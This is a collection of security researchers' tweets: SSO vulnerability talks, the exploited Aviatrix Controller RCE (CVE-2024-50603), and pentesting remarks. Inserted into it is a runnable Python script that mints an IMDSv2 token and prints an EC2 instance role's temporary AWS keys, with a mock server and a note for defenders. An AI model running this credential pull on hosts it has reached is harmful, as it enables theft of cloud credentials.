Authentication has always been hard. Mateusz @molejarka will present recent examples of security problems related to OAuth and OpenID Connect, and issues in GCP and Azure.
📣 “CAse study of Recently DIscovered vulNerAbiLities in Single sIgn oN mechaniSms”
🎫 https://t.co/9nLmpjltUf
🚨The new unauthenticated RCE affecting Aviatrix Controllers (CVE-2024-50603) is the real deal - with a single POST request 🫠 and a super trivial exploit, it takes less than 30 seconds to:
1. Collect all Aviatrix Controllers over the internet
2. Validate exploitability with a nuclei template that fetches /etc/passwd
3. Fetch IMDSv2 token
4. Extract AWS Credentials
5. GG
If your company uses Aviatrix Controller, I'd advise patching immediately and assuming compromise since January 7th.
Original blog: https://t.co/cDHNfUBTc8
@wiz_io exploitation in the wild: https://t.co/WLTy2dGmwq
PoC for extracting IMDSv2 token & AWS keys -
Stay Safe & until the next one 🫡
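Steps 3 and 4 of the tweet above, the IMDSv2 token mint followed by the instance-profile credential pull, as an added example; this is not the poster's PoC and contains nothing specific to Aviatrix or CVE-2024-50603. The HTTP exchange against `169.254.169.254` is the documented IMDSv2 flow (PUT `/latest/api/token` with a TTL header, then GETs carrying `X-aws-ec2-metadata-token`). The role name, key IDs and mock server are constructed so the script runs offline; point `get_role_credentials()` at the real endpoint on an EC2 host.

```python
"""IMDSv2 credential pull: mint a session token, list the instance-profile
role, fetch its temporary keys, print them as AWS CLI/SDK env exports.
Added example; the mock IMDS at the bottom is a constructed stand-in."""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

IMDS = "http://169.254.169.254"  # real endpoint; tests override it with the mock
TOKEN_HDR = "X-aws-ec2-metadata-token"
TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def _req(base, path, method="GET", headers=None):
    req = urllib.request.Request(base + path, method=method, headers=headers or {})
    with urllib.request.urlopen(req, timeout=3) as r:
        return r.read().decode()


def get_imdsv2_token(base=IMDS, ttl=300):
    # IMDSv2 is session-oriented: a PUT with a TTL header mints a token
    # that every later metadata GET must carry.
    return _req(base, "/latest/api/token", method="PUT", headers={TTL_HDR: str(ttl)})


def get_role_credentials(base=IMDS):
    hdr = {TOKEN_HDR: get_imdsv2_token(base)}
    # The listing is one role name per line; take the first.
    role = _req(base, CREDS_PATH, headers=hdr).strip().splitlines()[0]
    creds = json.loads(_req(base, CREDS_PATH + role, headers=hdr))
    return role, creds


def as_env(creds):
    # Shape the JSON into the three variables the AWS CLI/SDKs read.
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


def probe_v1_fallback(base=IMDS):
    # Does the endpoint still answer a token-less (IMDSv1-style) GET?
    # Returns the HTTP status; 401 means IMDSv2 is enforced.
    try:
        _req(base, CREDS_PATH)
        return 200
    except urllib.error.HTTPError as e:
        return e.code


# --- constructed mock IMDS so the exchange runs offline (all values fake) ---
FAKE_TOKEN = "mock-imdsv2-token"
FAKE_ROLE = "ctrl-instance-role"
FAKE_CREDS = {"Code": "Success", "Type": "AWS-HMAC",
              "AccessKeyId": "ASIAEXAMPLE000000000",
              "SecretAccessKey": "example-secret", "Token": "example-session-token",
              "Expiration": "2030-01-01T00:00:00Z"}


class MockIMDS(BaseHTTPRequestHandler):
    def log_message(self, *a):  # keep output quiet
        pass

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        ok = self.path == "/latest/api/token" and TTL_HDR in self.headers
        self._send(200, FAKE_TOKEN) if ok else self._send(400, "")

    def do_GET(self):
        # IMDSv2-only behaviour: no valid token, no metadata.
        if self.headers.get(TOKEN_HDR) != FAKE_TOKEN:
            self._send(401, "")
        elif self.path == CREDS_PATH:
            self._send(200, FAKE_ROLE + "\n")
        elif self.path == CREDS_PATH + FAKE_ROLE:
            self._send(200, json.dumps(FAKE_CREDS))
        else:
            self._send(404, "")


def start_mock():
    srv = HTTPServer(("127.0.0.1", 0), MockIMDS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    base = start_mock()
    role, creds = get_role_credentials(base)
    for k, v in as_env(creds).items():
        print(f"export {k}={v}")
```

Note for defenders: requiring IMDSv2 does not stop this step, because the request originates on the controller instance itself after the RCE; the token dance and hop-limit protect against SSRF and stray containers, not against code running on the host. The lever that limits blast radius is the instance profile's IAM policy, plus alerting on those temporary keys being used from outside the instance.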
🛡️ We added #Aviatrix Controller OS command injection vulnerability CVE-2024-50603 to our Known Exploited Vulnerabilities Catalog. Visit https://t.co/myxOwap1Tf & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec
User authentication is a hard problem. Recent years have brought a flood of Single Sign On solutions and their ever-growing adoption. 🔒 That is both good and bad. Why? Mateusz @molejarka will explain in more detail!
You can see his talk on 26 November 🔜 https://t.co/0LxLipoOnN
@nnwakelam Pentesting may be dull, but you get a stable income, no bad triage experiences and no discussion about the payout amount; you get paid once you have tested the scope, whether or not you found something 😎😜
@nnwakelam I stopped doing bug bounty some time ago. For me personally it was a few cases where 1. I had to wait a long, long time for triage, 2. I hit a P1 but got paid as for a P2, 3. I got a silent fix and a duplicate/unable to reproduce. 🤷‍♂️
@naugtur Sure, most apps do have an existing session, assuming that the phone unlock is enough; some apps require auth anyway. It depends on what app you write.
That’s hard - stopping the #pentest because you have a deadline and not being sure that you did everything and checked everywhere. A detailed scope and checklists help a bit, but it’s still hard.
One day I'm going to design a TryHackMe room with a few minor vulns and a practically impossible to find (without source code) RCE to get the flag.
The entire point of the box is to teach people it's OK to stop looking and give up.
As pentesters, we have a limited amount of time testing things. You will miss stuff that later attackers will find. That's OK.
I got a confirmation from @bookingcom in a DM that indeed this is how it’s supposed to work - the hotel sends you an email with a random-looking link asking you to provide credit card information, and you should do it, otherwise they have the right to cancel your reservation.
Join us at @TyphoonCon in Seoul on May 27-31!
@_r3ggi will talk about broken isolation and draining credentials from popular macOS password managers.
#typhooncon #itsec #cybersec
https://t.co/n5lq4fo52G